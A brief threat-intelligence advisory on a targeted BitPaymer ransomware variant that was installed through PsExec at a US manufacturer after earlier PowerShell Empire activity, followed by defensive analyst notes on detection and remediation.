A more targeted approach is being used by attackers when they are choosing the recipients of ransomware. This BitPaymer variant (Ransom.Win32.BITPAYMER.TGACAJ) has been seen a few times recently and it is unique because it mentions the targeted company by name in the ransom note, making it specific. That’s exactly what it did when it sent commands to the unnamed US manufacturing company’s system through PsExec on February 18th. Attackers were also attempting to run the PowerShell Empire Backdoor starting on January 29th leading up to the 18th of February when the BitPaymer Ransomware was installed. It is likely that a data breach occurred prior to or on the 29th of January because attackers needed administrator privileges to install BitPaymer through PsExec.
Analyst Notes
Companies can use intrusion detection systems that would have been able to detect malicious activity within the system. If accounts are believed to have been compromised, they should be updated immediately and if machines are believed to have been compromised, they should be cleaned as soon as possible to stop the spread of ransomware or malware.
